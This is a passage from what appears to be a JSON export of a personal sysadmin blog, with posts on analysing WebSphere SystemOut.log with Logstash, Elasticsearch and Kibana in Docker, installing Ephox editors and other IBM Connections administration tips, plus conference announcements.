a new search for was_loglevel:E AND was_responsecode:* (show me all log messages with a response code and of loglevel E) and created a line chart on basis of this search:\nYou see a strong peak for one of the response codes:\nNow we get the information, that CLFRW0034E is the reponse code of this peak. Let’s check what log message comes with this code:\ncom.ibm.connections.search.index.process.incremental.IndexBuilder buildService CLFRW0034E: Error reading or writing to the index directory. Please check permissions and capacity. Ok, that’s quite interesting, disk full or problem with NAS, NFS or something like this. I know this issue is already solved, because no more errors after this peak, but when kibana would send me an information when some error counts increase (and that’s possible) it would be great.\nAdding timezone To get the time in my local timezone or utc, even when the log was generated outside in an other timezone, i added following lines:\n# add timezone information translate { field =\u0026gt; \u0026#39;tz\u0026#39; destination =\u0026gt; \u0026#39;tz_num\u0026#39; dictionary =\u0026gt; [ \u0026#39;CET\u0026#39;, \u0026#39;+0100\u0026#39;, \u0026#39;CEST\u0026#39;, \u0026#39;+0200\u0026#39;, \u0026#39;EDT\u0026#39;, \u0026#39;-0400\u0026#39; ] } mutate { replace =\u0026gt; [\u0026#39;timestamp\u0026#39;, \u0026#39;%{wastimestamp} %{tz_num}\u0026#39;] } I need to install the translate plugin for logstash and you need to extend the list of timezones manually:\n/opt/logstash/bin/logstash-plugin install logstash-filter-translate Add plugins to Docker container Since this weekend i like Docker more and more. It’s really easy to test different filters (i work on IBM Domino console.log filter and additional filebeat stuff) and restart with a clean environment again.\nThe official images for ELK do not have all plugins i wanted to use installed, so i need to create my own Docker containers for ElasticSearch and Logstash, only small changes were need for docker-compose.\nDockerfile Elasticsearch FROM elasticsearch:latest RUN bin/plugin install lmenezes/elasticsearch-kopf Creating elasticsearch container:\ndocker build -t \u0026#34;stoeps:elasticsearch\u0026#34; . Dockerfile Logstash FROM logstash:latest # Install logstash-input-beats RUN /opt/logstash/bin/logstash-plugin install logstash-input-beats \u0026amp;\u0026amp; /opt/logstash/bin/logstash-plugin install logstash-filter-translate Creating logstash container:\ndocker build -t \u0026#34;stoeps:logstash\u0026#34; . Docker-compose.yml elasticsearch: image: stoeps:elasticsearch ... logstash: image: stoeps:logstash ... ports: - \u0026#34;5000:5000\u0026#34; - \u0026#34;5044:5044\u0026#34; ... So you see i changed the image names to the container names i created before and i added an extra port to enable filebeat.\n","excerpt":"\u003cp\u003eLast week I wrote a post about\n\u003ca href=\"https://www.stoeps.de/using-docker-to-analyze-websphere-application-server-systemout-log/\" target=\"_blank\"\u003eUsing Docker and ELK to Analyze WebSphere Application Server SystemOut.log \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nbut i wasn’t happy with my date filter and how the websphere response\ncode is analyzed. The main problem was, that the WAS response code is\nnot always on the beginning of a log message, or do not end with “:” all\nthe time.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-05-29-better-logstash-filter-to-analyze-systemout-log-and-some-more/","title":"Better logstash filter to analyze SystemOut.log and some more"},{"body":"I often get SystemOut.log files from customers or friends to help them analyzing a problem. Often it is complicated to find the right server and application which generates the real error, because most WebSphere Applications (like IBM Connections or Sametime) are installed on different Application Servers and Nodes. So you need to open multiple large files in your editor, scroll each to the needed timestamps and check the lines before for possible error messages.\nKlaus Bild showed on several conferences and in his blog the functionality of ELK, so I thought about using ELK too. I started to build a virtual machine with ELK Stack (Elasticsearch, Logstash \u0026amp; Kibana) and imported my local logs and logs i got mailed. This way is cool to analyze your environment, but adding just some SystemOut.logs from outside is not the best way. It’s hard to remove this stuff after analyzing from a ELK instance.\nThen I found a tutorial to install ELK with Docker, there is even a great Part 2 of this post, which helps us installing an ELK Cluster. Just follow this blog posts, install Docker and Docker-compose. It’s really fast deployed. In my case i do not use flocker, it’s enough to use a local data container for the elasticsearch data.\nWhy do I use Docker instead of a virtual machine? It’s super easy to just drop the data container and begin with an empty database.\nMy setup I created a folder on my Mac to put all needed stuff for the Docker images to it:\nmkdir elk cd elk Create a file Docker-compose.yaml with following content:\nelasticsearch: image: elasticsearch:latest command: elasticsearch -Des.network.host=0.0.0.0 ports: - \u0026#34;9200:9200\u0026#34; - \u0026#34;9300:9300\u0026#34; volumes: - elasticsearch1:/usr/share/elasticsearch/data logstash: image: logstash:latest command: logstash -f /etc/logstash/conf.d volumes: - ./conf.d:/etc/logstash/conf.d - ./logs:/opt/logs ports: - \u0026#34;5000:5000\u0026#34; links: - elasticsearch kibana: image: kibana ports: - \u0026#34;5601:5601\u0026#34; links: - elasticsearch environment: - ELASTICSEARCH_URL=http://elasticsearch:9200 So you see that elasticsearch is using a data-container for /usr/share/elasticsearch/data and logstash reads the configuration from a local folder ./conf.d and we map an additional local folder logs to /opt/logs. This log folder will be used to copy SystemOut.logs for analyzation to it.\nelk/conf.d I splitted my logstash configuration to multiple files, but you can copy them together if you want.\nelk/conf.d/10-websphere-input.conf input { file { path =\u0026gt; [ \u0026#34;/opt/logs/*/*/SystemOut.log\u0026#34; ] start_position =\u0026gt; \u0026#34;beginning\u0026#34; type =\u0026gt; \u0026#34;websphere\u0026#34; # important! logstash read only logs from files touched the last 24 hours # 8640000 = 100 days ignore_older =\u0026gt; \u0026#34;8640000\u0026#34; } } You can see that i added // in front of the log file. This will be used to tag the log messages with company and servername, so i can search and filter on basis of these tags. So i assume that the first folder after /opt/logs is the company (or test/production) and the second folder will be the servername.\nelk/conf.d/50-websphere-filter.conf filter { multiline{ # Nothing will pass this filter unless it is a new event ( new [2014-03-02 1.... ) # multiline adds java error traces to original log entry pattern =\u0026gt; \u0026#34;^\\[\u0026#34; what =\u0026gt; \u0026#34;previous\u0026#34; negate=\u0026gt; true } if [path] =~ \u0026#34;SystemOut.log\u0026#34; { grok { # get company and servernames from folder names match =\u0026gt; [\u0026#34;path\u0026#34;, \u0026#34;%{GREEDYDATA}/%{GREEDYDATA:company}/%{GREEDYDATA:server_name}/SystemOut.log\u0026#34;] } grok { match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{SPACE}%{SPACE}%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{SPACE}%{SPACE} \\[%{GREEDYDATA:was_sibbus}\\] +%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{GREEDYDATA:message2} +%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{GREEDYDATA:message2}\\) +%{WORD:was_errorcode} +%{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{GREEDYDATA:message}\u0026#34;] overwrite =\u0026gt; [ \u0026#34;message\u0026#34; ] } date{ match =\u0026gt; [\u0026#34;timestamp\u0026#34;, \u0026#34;dd/MM/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;M/d/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;MM/d/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;M/dd/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;MM/dd/YY H:mm:ss:SSS\u0026#34;, \u0026#34;M/d/YY H:mm:ss:SSS\u0026#34;, \u0026#34;MM/d/YY H:mm:ss:SSS\u0026#34;, \u0026#34;M/dd/YY H:mm:ss:SSS\u0026#34;] } } } I remove the timezone information of the timestamp, so if you need to know the local time of your system, you should adjust this (had problems with CEST and so on, so i just removed it).\nI tried to get the most informations i can, but the filter is not complete until now, some message do not provide us the right error_code, but i think it is a good starting point.\nYou can use the same filter for SystemOut.logs sent through the network, or with other ELK tools, then the company and server information is not tagged.\nelk/conf.d/90-elasticsearch-output.conf output { if \u0026#34;_grokparsefailure\u0026#34; not in [tags] { elasticsearch { hosts =\u0026gt; \u0026#34;elasticsearch:9200\u0026#34; } } } Just the code that logstash forwards the log messages to elasticsearch with the additional tags and updated timestamps.\nThat’s pretty much all. Open a command window and change to the elk folder:\ncd elk docker-compose -f docker-compose.yml up -d Open http://localhost:5601 in your browser and you can start using kibana with your logs.\nWhen you want to reset the containers, just use:\ndocker-compose -f docker-compose.yml rm -f --all docker volume rm elasticsearch1 And after this you can create the containers again.\nStart using Kibana Open http://localhost:5601 in your favorite browser and configure the index pattern:\nI check rather old logfiles here, so i get following page on “Discover”:\nSo moving the timepicker a little bit and we see the first log messages:\nYou see we can expand a single message entry and check tags and informations, even the java error stacks (multiline) are grouped together, additionally to the error or log message we get all added fields we generated out of the log file:\nExample of multiline:\nExample of filtering and changing the view (only showing special error codes):\nSo now we can start custimizing the view filter for event type, error code and so on. Have fun to start analyzing with ELK.\n","excerpt":"\u003cp\u003eI often get SystemOut.log files from customers or friends to help them\nanalyzing a problem. Often it is complicated to find the right server\nand application which generates the real error, because most WebSphere\nApplications (like IBM Connections or Sametime) are installed on\ndifferent Application Servers and Nodes. So you need to open multiple\nlarge files in your editor, scroll each to the needed timestamps and\ncheck the lines before for possible error messages.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-05-28-using-docker-to-analyze-websphere-application-server-systemout-log/","title":"Using Docker and ELK to Analyze WebSphere Application Server SystemOut.log"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ephox/","title":"Ephox"},{"body":"Several people told me that installing the Editors is not described very well in the IBM Connections documentation. So i decided to write down the steps I used to deploy the editors. Hope it helps.\nCheck Installation on ephox: http://docs.ephox.com/display/EphoxForIBMConnections/Installing+Textbox.io+Services * Extract EPHOX_EDITORS3.0.1_CONN5.5.zip edit config/config.js * editor: 'textbox.io | EditLive | CKEditor | role-based'\n+ This sets the default editor. When you use role-based you can enable textbox.io and EditLive for different user groups.\n+ Be aware that editlive needs a Java plugin which is mostly deactivated or outdated in actual browsers. * Enable Spelling-Servie URL (you need to deploy tbioServices_c5.ear):\n+ spellingServiceUrl: \u0026quot;https://connections-host/ephox-spelling\u0026quot;\n+ You have to set to https, that spell-checking works with http and https access to Connections.\n+ If you have selected role-based, you must deploy the EphoxEditorsForConnections.ear * When you want to use the builtin spellchecking, you need to install services/tbioServices_c5.ear Start ./install.sh or install.exe\n+ * ./install.sh root@webspherehost \u0026lt;customization-dir\u0026gt; \u0026lt;webressources-dir\u0026gt;\n+ You need to type the root password 3 times, because installation uses seperate ssh calls for the installation * Create /opt/ephox/application.conf\n+ (WINDOWS: WAS_INSTALLATION_DRIVE:\\opt\\ephox\\application.conf)\nephox { allowed-origins { origins = [ \u0026#34;https://connections-55.panastoeps.local\u0026#34;, \u0026#34;http://connections-55.panastoeps.local\u0026#34; ], url = \u0026#34;https://connections-55.panastoeps.local/ephox-allowed-origins/cors\u0026#34; } } Map Applications to your webserver, update the Connections versionstamp and restart Common and Ephox Applications\nVerify: https://\u0026lt;your_server_and_port\u0026gt;/connections/resources/web/ephox.editors.connections/verify.html\n","excerpt":"\u003cp\u003eSeveral people told me that installing the Editors is not described very\nwell in the IBM Connections documentation. So i decided to write down\nthe steps I used to deploy the editors. Hope it helps.\u003c/p\u003e\n\u003cp\u003eCheck Installation on ephox:\n\u003ca href=\"http://docs.ephox.com/display/EphoxForIBMConnections/Installing\u0026#43;Textbox.io\u0026#43;Services\" target=\"_blank\"\u003ehttp://docs.ephox.com/display/EphoxForIBMConnections/Installing+Textbox.io+Services \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-03-12-ibm-connections-5-5-install-ephox-editors/","title":"IBM Connections 5.5 install Ephox Editors"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/textbox.io/","title":"Textbox.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/fix/","title":"Fix"},{"body":"Wikis in IBM Connections 5.5 have a little bug, because the link (/library instead of /wikis/form/api/library) for images are wrong and so they are not displayed.\nThere is a technote , which should solve this issue, but the used way with ProxyPass is not what i want to use. When you use ProxyPass and ProxyPassReverse you should add a ProxyRequest off to be more secure. ProxyPass to localhost can be a problem too, i would suggest to change localhost to the Connections IHS Hostname.\nWhy do I use a different approach? Most of my deployments already use a RewriteRule to redirect the hostname to there Connections Homepage, so i don’t need an additional module (which needs ressources and can have security considerations), when i can solve the image issue through mod_rewrite.\nRewriteRule \u0026quot;^/library/(.*)\u0026quot; \u0026quot;/wikis/form/api/library/$1\u0026quot; [R,L]\nIf you haven’t set \u0026lt;forceConfidentialCommunications enabled=\u0026quot;true\u0026quot;/\u0026gt; in LotusConnections-config.xml you need to set the RewriteRule and the ProxyPass config within your http and your https configuration parts!\nExample httpd.conf: ... # HTTP configuration \u0026lt;VirtualHost *:80\u0026gt; ServerName connections.example.com RewriteEngine On # Redirect hostname to Homepage RewriteRule ^\\/$ https://connections.example.com/homepage [noescape,L,R] # Fix wrong wiki image URL RewriteRule \u0026#34;^/library/(.*)\u0026#34; \u0026#34;/wikis/form/api/library/$1\u0026#34; [R,L] \u0026lt;/VirtualHost\u0026gt; # HTTPS configuration \u0026lt;VirtualHost *:443\u0026gt; ServerName connections.example.com RewriteEngine On # Redirect hostname to Homepage RewriteRule ^\\/$ https://connections.example.com/homepage [noescape,L,R] # Fix wrong wiki image URL RewriteRule \u0026#34;^/library/(.*)\u0026#34; \u0026#34;/wikis/form/api/library/$1\u0026#34; [R,L] SSLEnable SSLProtocolDisable SSLv2 SSLv3 \u0026lt;/VirtualHost\u0026gt; ... ","excerpt":"\u003cp\u003eWikis in IBM Connections 5.5 have a little bug, because the link\n(\u003ccode\u003e/library\u003c/code\u003e instead of \u003ccode\u003e/wikis/form/api/library\u003c/code\u003e) for images are wrong\nand so they are not displayed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-03-06-missing-images-in-wikis-after-migration-to-ibm-connections-5-5/","title":"Missing images in Wikis after migration to IBM Connections 5.5"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibmconnect/","title":"Ibmconnect"},{"body":"Since the IBM Connect pages does not show all presentation, I uploaded mine to slideshare.\nTDI Solutions Best Practices with IBM Connections Deployments Best and Worst Practices Deploying IBM Connections 2016 ","excerpt":"\u003cp\u003eSince the IBM Connect pages does not show all presentation, I uploaded mine to \u003cdel\u003eslideshare\u003c/del\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-02-09-my-presentations-at-ibm-connect-2016/","title":"My presentations at IBM Connect 2016"},{"body":"Today i read a question in the IBM Connections Forum about setting the EMPLOYEE_EXTENDED role to all users in a Connections deployment.\nIt would be easy to set it directly in the database, but that’s not supported by IBM.\nI wrote a little script some weeks ago, because i had the same request, but never published it. The good thing here it only uses supported commands.\nSo i use this question to add it as a new script to my GitHub Repository .\nHere you see the source, it is simple a join of the tables emp_role_map and employee:\nconnect to peopledb; EXPORT TO mail.txt OF DEL MODIFIED by NOCHARDEL select e.PROF_MAIL FROM EMPINST.EMPLOYEE e inner join EMPINST.EMP_ROLE_MAP r on r.PROF_KEY=e.PROF_KEY where r.ROLE_ID!=\u0026#39;employee.extended\u0026#39;; connect reset; Just call it with db2 -tvf scriptname.sql.\nThe script exports a list of mail addresses of users without the specified role. This can then be used with the wsadmin command\nProfilesService.setBatchRole(EMPLOYEE_EXTENDED, \u0026#34;mail.txt\u0026#34;) Or as a oneliner:\nwsadmin.bat -lang jython -c \u0026#39;ProfilesService.setBatchRole(EMPLOYEE_EXTENDED, \u0026#34;mail.txt\u0026#34;)\u0026#39; Scheduling the two commands with Windows Scheduler or cron is enough to update all users to the specified role.\nDocumentation is provided in the script head.\n","excerpt":"\u003cp\u003eToday i read a question in the IBM Connections Forum\n\u003ca href=\"http://www-10.lotus.com/ldd/lcforum.nsf/d6091795dfaa5b1185256a7a0048a2d0/9a49290a4458d58985257f4100393ef2?OpenDocument\" target=\"_blank\"\u003eabout\nsetting the EMPLOYEE_EXTENDED role to all users \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in a Connections\ndeployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-01-21-adding-employee_extended-to-all-users/","title":"Adding EMPLOYEE\\_EXTENDED to all users"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/db2/","title":"DB2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sql/","title":"SQL"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/failure/","title":"Failure"},{"body":"Today I got a call that a IBM HTTP Server stopped working after a reboot. The service starts and ends again after some seconds. In the error_log of IBM HTTP we found following messages:\n[notice] Bld version: 8.5.5 [notice] Bld date: Oct 30 2014, 11:44:02 [notice] Webserver: IBM_HTTP_Server [notice] Using config file C:/IBM/HTTPServer/conf/httpd.conf [notice] IBM_HTTP_Server/8.5.5.4 (Win32) configured -- resuming normal operations [notice] Server built: Oct 20 2014 10:58:09 [notice] Disabled use of AcceptEx() WinSock2 API [notice] Parent: Created child process 4004 [crit] Error 10 initializing SSL environment, aborting startup [error] SSL0115E: Initialization error, Error validating ASN fields in certificate. Configuration Failed [crit] (OS 1813)The specified resource type cannot be found in the image file. : master_main: create child process failed. Exiting. [notice] Parent: Forcing termination of child process 5 Good source found was:\nhttps://developer.ibm.com/answers/questions/195652/why-is-the-ibm-http-server-8x-version-fails-to-sta.html In our case the Stashfile was configured with a expiration date. So just open the keyfile, change password and check that the option expiration of stash is deactivated.\n","excerpt":"\u003cp\u003eToday I got a call that a IBM HTTP Server stopped working after a\nreboot. The service starts and ends again after some seconds. In the\nerror_log of IBM HTTP we found following messages:\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-12-21-ssl0115e-initialization-error-error-validating-asn-fields-in-certificate/","title":"SSL0115E: Initialization error, Error validating ASN fields in certificate"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/api/","title":"API"},{"body":"Today i thought about creating and deleting some Communities with the REST API. Works really good and i need to post my findings sometimes.\nFirst cool thing is that you can create restricted Communities with external feature through REST.\nAfter deleting these Communities i checked the Community overview through my browser and found following view:\nSo you mustn’t use wsadmin to restore Communities from trash, you can use this view. Never heared of it and the documentation still mentions wsadmin as the only way to restore them.\n","excerpt":"\u003cp\u003eToday i thought about creating and deleting some Communities with the\nREST API. Works really good and i need to post my findings sometimes.\u003c/p\u003e\n\u003cp\u003eFirst cool thing is that you can create restricted Communities with\nexternal feature through REST.\u003c/p\u003e\n\u003cp\u003eAfter deleting these Communities i checked the Community overview\nthrough my browser and found following view:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/12/2015-12-15_20-45-47.png\" alt=\"2015 12 15 20 45 47\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eSo you mustn’t use wsadmin to restore Communities from trash, you can\nuse this view. Never heared of it and the\n\u003ca href=\"http://www-01.ibm.com/support/knowledgecenter/SSYGQH_5.0.0/admin/admin/t_admin_communities_soft_del.html?lang=en\" target=\"_blank\"\u003edocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nstill mentions wsadmin as the only way to restore them.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-12-15-ibm-connections-communities-trash/","title":"IBM Connections – Communities Trash"},{"body":"The next big IBM Connections Community event – Social Connections 9 – takes place November 05/06 in Ehningen / Germany. The theme of the event is “Working out loud” and it offers tons of sessions all around IBM Connections and Adoption in the social software world.\nThis will be my fifth Social Connections Event after Zurich, Prague, Stockholm and Boston, for me all of them were great experiences and personally very successful.\nI have been working with ESS / ICS / Lotus products since 2000 and I followed many other community members through blogs, forums, web events and tweets, but I rarely had the chance to meet any of them in person. This changed with Social Connections V – I sent my first English session on the topic of scripting in IBM Connections and was accepted. I still can remember the warm welcome of Sharon , Klaus , Stuart , Simon , Femke , Sandra and Tim – it was phantastic!\n(Photo ©2015 by Oliver Heinz )\nThere a some really good ESS events all around the globe, but my focus topic is best covered by Social Connections. I like the agenda with all the different topics it covers: announcements (René Schimmer will show IBM Connections next ); Technic (master brains like Victor , Martin and Sjaak will speak); Deployment; Development (e.g. Paul and René ); Use Cases (Alan Hamilton ); or Adoption. And the best of all there is room to get the speaker personally for deeper discussion during the day and on the evening reception . Best chances for growing the own knowledge.\nAfter “only” attending and speaking up until now, This time Ii got the chance to help organizing this event. So, for the last three months I had the honour of assisting Wannes, Stuart, Simon, Doug, Lars, Martin, Jan, Maria and Femke in creating “Social Connections 9”. It is my sincere wish that you will like this event as much as I enjoyed all the events I “only” participated in before.\nThis time I am presenting two sessions, one with Victor Toal on IBM Connections Administration and a renewed “Best and worst practises deploying IBM Connections” . I am looking forward to co-presenting with Victor – I think we are a funny, yet dynamic duo with strange German dialects (him Austrian and I Bavarian), but we will (try to) speak in English, so all the people can follow, not only Germans with a fair understanding of the more beautiful German dialects ….\nSo, this is enough of me, my opinions and an introduction into German dialects – you Can still register for this event and I urge you to if you have not done so yet – think of all the lovely folk you can finally meet and interact with!\nRegistration is still open and thanks to our great sponsors it will cost you only 179€ (excl VAT), which also covers the admission to the AWESOME gala reception .\nWhat are you waiting for?\n","excerpt":"\u003cp\u003eThe next big IBM Connections Community event –\n\u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections 9 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – takes place\nNovember 05/06 in Ehningen / Germany. The theme of the event is “Working\nout loud” and it offers tons of sessions all around IBM Connections and\nAdoption in the social software world.\u003c/p\u003e\n\u003cp\u003eThis will be my fifth Social Connections Event after Zurich, Prague,\nStockholm and Boston, for me all of them were great experiences and\npersonally very successful.\u003c/p\u003e\n\u003cp\u003eI have been working with ESS / ICS / Lotus products since 2000 and I\nfollowed many other community members through blogs, forums, web events\nand tweets, but I rarely had the chance to meet any of them in person.\nThis changed with Social Connections V – I sent my first English session\non the topic of scripting in IBM Connections and was accepted. I still\ncan remember the warm welcome of \u003ca href=\"http://socialshazza.com\" target=\"_blank\"\u003eSharon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://social365.com\" target=\"_blank\"\u003eStuart \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"https://twitter.com/SimplyS1mon\" target=\"_blank\"\u003eSimon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"http://femkegoedhart.com/\" target=\"_blank\"\u003eFemke \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://twitter.com/sandrach\" target=\"_blank\"\u003eSandra \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nand \u003ca href=\"http://tc-soft.com/blog/\" target=\"_blank\"\u003eTim \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – it was phantastic!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-10-15-social-connections-9-in-germany-only-three-weeks-away/","title":"Social Connections 9 In Germany – Only Three Weeks Away"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/stuttgart/","title":"Stuttgart"},{"body":"The call for abstracts for Social Connections 9 in Ehningen will be closed on monday! So if you plan to attend and want to share your knowledge you have only few days left to submit your abstract!\nThe first keynote speakers are announced and i see forward to meet John Stepper – “Working Out Loud: How to make work more effective \u0026amp; fulfilling across your organization” and Silvia Cambie – “Convincing the C-Suite: Collaboration begins with Culture” If you’re interested to attend the event you can register on Eventbrite , Social Connections 9 will be on 5th and 6th november in Ehningen, Germany.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"http://socialconnections.info/submit-abstract/\" target=\"_blank\"\u003ecall for abstracts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nfor \u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections 9 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Ehningen\nwill be closed on monday! So if you plan to attend and want to share\nyour knowledge you have only few days left to submit your abstract!\u003c/p\u003e\n\u003cp\u003eThe first \u003ca href=\"http://socialconnections.info/agenda/\" target=\"_blank\"\u003ekeynote speakers are\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and i see forward to meet \u003ca href=\"http://www.workingoutloud.com\" target=\"_blank\"\u003eJohn\nStepper \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n –\n\u003ca href=\"http://socialconnections.info/social-connections-first-keynote-speaker-announced/\" target=\"_blank\"\u003e“Working\nOut Loud: How to make work more effective \u0026amp; fulfilling across your\norganization” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://socialconnections.info/our-lineup-is-growing-social-connections-presents-second-keynote-speaker/\" target=\"_blank\"\u003eSilvia\nCambie – “Convincing the C-Suite: Collaboration begins with Culture” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIf you’re interested to attend the event\n\u003ca href=\"http://socialconnections.info/#tile_registration\" target=\"_blank\"\u003eyou can register on\nEventbrite \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, Social Connections 9 will be on 5th and 6th november in\nEhningen, Germany.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-28-social-connections-9-2-days-left-to-submit-abstracts/","title":"Social Connections 9 – 2 days left to submit abstracts"},{"body":"Admincamp 2015 will take place from 21st to 23rd September at Maritim Hotel Gelsenkirchen .\nI will talk about “IBM Connections administrieren” and “IBM Connections Best Practise”.\nDuring my first session i will show you the basic knowledge that you can manage your IBM Connections infrastructure, often needed tasks like reparent Communities, synchronise profiles, backup and basic troubleshooting.\nThe second session is the extended and updated version of my IBM ConnectED session, i will show you often seen mistakes during deployments, basic sizing thoughts and how to tune your environment.\nThe session will be in german and we have 90 minutes to cover all informations around IBM Connections deployment and administration.\nYou can find the whole agenda here .\nYou will find lots of well known people on this agenda like my colleague Christoph Adler , my former colleagues Andreas Artner , Denny Sternberg and Stephan Kopp , Alex Novak, Ben Menesi from Ytria , Ulrich Krause and much more!\nI like Admincamp very much because Rudi Knegt and his team created a great event with lots of content and the evening party with networking and knowledge sharing (and free beer).\nIf you’re interested in IBM ICS software, please join the event, there are still some places available. If you add my name or the blog address into the “Besonderheiten” field, you will get 50€ discount .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n will take place from 21st to\n23rd September at \u003ca href=\"http://www.maritim.de\" target=\"_blank\"\u003eMaritim Hotel Gelsenkirchen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI will talk about “IBM Connections administrieren” and “IBM Connections\nBest Practise”.\u003c/p\u003e\n\u003cp\u003eDuring my first session i will show you the basic knowledge that you can\nmanage your IBM Connections infrastructure, often needed tasks like\nreparent Communities, synchronise profiles, backup and basic\ntroubleshooting.\u003c/p\u003e\n\u003cp\u003eThe second session is the extended and updated version of my IBM\nConnectED session, i will show you often seen mistakes during\ndeployments, basic sizing thoughts and how to tune your environment.\u003c/p\u003e\n\u003cp\u003eThe session will be in german and we have 90 minutes to cover all\ninformations around IBM Connections deployment and administration.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-28-admincamp-2015-i-will-be-there/","title":"Admincamp 2015 – i will be there"},{"body":"Within the fixlist of the new released CR3 of IBM Connections 5 there are several new configuration options mentioned. One of the interesting ones for me is the mobile update parameter AllowRemoveAccount. The default value is “false” and your Connections environment still works before, but what’s changed when you set this to true?\nThe official documentation is already uptodate and shows us:\nWhen you set this option to true, accounts can be removed from a mobile device without requiring the user to login and without any authorization check. The user is asked to confirm the deletion of an account before it is removed.\nSo this helps me with my long list of Connections environments on my mobile clients. Until you set this to true you can only remove a profile, when you still can login to this system. I have several environments configured on my mobile which i can’t access anymore, because my user is disabled, or the system is only available within special wifi or network environments. So i’m not able to remove these accounts.\nI will set this to true in all environments i have access to, to prevent this behavior.\nPlease beware of the additional infos in the online help:\nIf a user has existing accounts that they cannot access and that were created before this feature was available, those accounts cannot be deleted using the AllowRemoveAccount property.\nValidation error After checking out the mobile-config.xml (yes you should always use wsadmin to change config parameters), the parameter was not set in the file. So i 